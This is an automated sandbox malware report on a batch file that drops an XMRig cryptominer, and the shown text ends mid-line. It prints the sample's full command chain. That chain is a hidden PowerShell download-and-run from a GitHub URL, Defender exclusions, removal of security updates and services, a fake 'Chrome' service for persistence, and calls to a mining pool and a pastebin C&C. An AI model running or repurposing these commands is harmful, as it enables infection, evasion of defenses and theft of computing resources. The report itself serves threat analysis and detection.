Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
eshkere.bat

Overview

General Information

Sample name:eshkere.bat
Analysis ID:1528950
MD5:ae8361d48c8131bc78d0be59c8c95515
SHA1:c3bc638c0556a66b4d98d56219e44adb2353235b
SHA256:70ed9e7f429794334f660a314728f835421a8e203f55fd0a5ed3fde08967bebb
Tags:batgithub-com-fruktoozikuser-JAMESWT_MHT
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Stop EventLog
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell download and execute
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Connects to a pastebin service (likely for C&C)
Injects code into the Windows Explorer (explorer.exe)
Loading BitLocker PowerShell Module
Modifies the context of a thread in another process (thread injection)
Modifies the hosts file
Powershell drops PE file
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: PowerShell DownloadFile
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious execution chain found
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Electron Application Child Processes
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • cmd.exe (PID: 1876 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\eshkere.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4872 cmdline: powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 6584 cmdline: powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\1348.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • 1348.exe (PID: 6592 cmdline: "C:\Users\user\AppData\Local\Temp\1348.exe" MD5: 1A67A432E7AB0BCD2189F3F4142F2AE4)
        • powershell.exe (PID: 3304 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 2144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 5508 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 1292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wusa.exe (PID: 2296 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
        • sc.exe (PID: 748 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 1404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 3816 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 3636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 4864 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 5096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 2988 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 3608 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 6684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 5256 cmdline: C:\Windows\system32\sc.exe delete "Chrome" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 6732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 3280 cmdline: C:\Windows\system32\sc.exe create "Chrome" binpath= "C:\ProgramData\Chrome.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 1648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 1944 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 5720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 6912 cmdline: C:\Windows\system32\sc.exe start "Chrome" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • conhost.exe (PID: 6496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Chrome.exe (PID: 1868 cmdline: C:\ProgramData\Chrome.exe MD5: 1A67A432E7AB0BCD2189F3F4142F2AE4)
    • powershell.exe (PID: 6156 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3556 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 5084 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 6848 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 3716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 2796 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 3152 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 3128 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 4140 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 1404 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • explorer.exe (PID: 4680 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
SourceRuleDescriptionAuthorStrings
eshkere.batJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    SourceRuleDescriptionAuthorStrings
    sslproxydump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000030.00000002.3883473014.00000000008DF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        Process Memory Space: powershell.exe PID: 4872JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          SourceRuleDescriptionAuthorStrings
          amsi64_4872.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')", CommandLine: powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\eshkere.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1876, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')", ProcessId: 4872, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1348.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1348.exe, ParentProcessId: 6592, ParentProcessName: 1348.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 3304, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')", CommandLine: powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\eshkere.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1876, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')", ProcessId: 4872, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')", CommandLine: powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\eshkere.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1876, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')", ProcessId: 4872, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')", CommandLine: powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\eshkere.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1876, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')", ProcessId: 4872, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1348.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1348.exe, ParentProcessId: 6592, ParentProcessName: 1348.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 3304, ProcessName: powershell.exe
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\ProgramData\Chrome.exe, ParentImage: C:\ProgramData\Chrome.exe, ParentProcessId: 1868, ParentProcessName: Chrome.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 6156, ProcessName: powershell.exe
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')", CommandLine: powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\eshkere.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1876, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')", ProcessId: 4872, ProcessName: powershell.exe
            Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "Chrome" binpath= "C:\ProgramData\Chrome.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "Chrome" binpath= "C:\ProgramData\Chrome.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1348.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1348.exe, ParentProcessId: 6592, ParentProcessName: 1348.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "Chrome" binpath= "C:\ProgramData\Chrome.exe" start= "auto", ProcessId: 3280, ProcessName: sc.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')", CommandLine: powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\eshkere.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1876, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/fruktoozik/qnfr/raw/refs/heads/main/frik.exe', 'C:\Users\user\AppData\Local\Temp\1348.exe')", ProcessId: 4872, ProcessName: powershell.exe

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1348.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1348.exe, ParentProcessId: 6592, ParentProcessName: 1348.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 1944, ProcessName: sc.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-10-08T14:02:44.743380+020020362892Crypto Currency Mining Activity Detected192.168.2.9601741.1.1.153UDP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: C:\ProgramData\Chrome.exeReversingLabs: Detection: 76%
            Source: C:\Users\user\AppData\Local\Temp\1348.exeReversingLabs: Detection: 76%
            Source: eshkere.batReversingLabs: Detection: 15%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Bitcoin Miner

            barindex
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: 00000030.00000002.3883473014.00000000008DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.9:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.9:49707 version: TLS 1.2
            Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: Chrome.exe, 0000001F.00000003.1667960638.00000147A44F0000.00000004.00000001.00020000.00000000.sdmp

            Software Vulnerabilities

            barindex
            Source: C:\ProgramData\Chrome.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

            Networking

            barindex
            Source: C:\Windows\explorer.exeNetwork Connect: 95.179.241.203 443
            Source: C:\Windows\explorer.exeNetwork Connect: 104.20.4.235 443
            Source: unknownDNS query: name: pastebin.com
            Source: global trafficHTTP traffic detected: GET /fruktoozik/qnfr/raw/refs/heads/main/frik.exe HTTP/1.1Host: github.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /fruktoozik/qnfr/refs/heads/main/frik.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 95.179.241.203 95.179.241.203
            Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
            Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
            Source: Joe Sandbox ViewIP Address: 185.199.109.133 185.199.109.133
            Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Network trafficSuricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.9:60174 -> 1.1.1.1:53
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /fruktoozik/qnfr/raw/refs/heads/main/frik.exe HTTP/1.1Host: github.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /fruktoozik/qnfr/refs/heads/main/frik.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /raw/FBXiGyZ9 HTTP/1.1Accept: */*Connection: closeHost: pastebin.comUser-Agent: cpp-httplib/0.12.6
            Source: global trafficDNS traffic detected: DNS query: github.com
            Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
            Source: global trafficDNS traffic detected: DNS query: pool.hashvault.pro
            Source: global trafficDNS traffic detected: DNS query: pastebin.com
            Source: powershell.exe, 00000003.00000002.1542373154.000002570162B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1542373154.00000257016B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1542373154.00000257016A5000.00000004.00000800.00020000.00000000.sdmp, Chrome.exe, 0000001F.00000003.1667858071.00000147A44F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
            Source: powershell.exe, 00000003.00000002.1542373154.000002570162B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1542373154.00000257016A5000.00000004.00000800.00020000.00000000.sdmp, Chrome.exe, 0000001F.00000003.1667858071.00000147A44F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
            Source: powershell.exe, 00000003.00000002.1542373154.000002570162B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1542373154.00000257016A5000.00000004.00000800.00020000.00000000.sdmp, Chrome.exe, 0000001F.00000003.1667858071.00000147A44F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
            Source: powershell.exe, 00000003.00000002.1542373154.000002570162B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1542373154.00000257016B7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1542373154.00000257016A5000.00000004.00000800.00020000.00000000.sdmp, Chrome.exe, 0000001F.00000003.1667858071.00000147A44F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
            Source: Chrome.exe, 0000001F.00000003.1667960638.00000147A44F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
            Source: Chrome.exe, 0000001F.00000003.1667960638.00000147A44F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
            Source: Chrome.exe, 0000001F.00000003.1667960638.00000147A44F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
            Source: Chrome.exe, 0000001F.00000003.1667960638.00000147A44F0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
            Source: powershell.exe, 00000003.00000002.1568771405.000002576F85E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
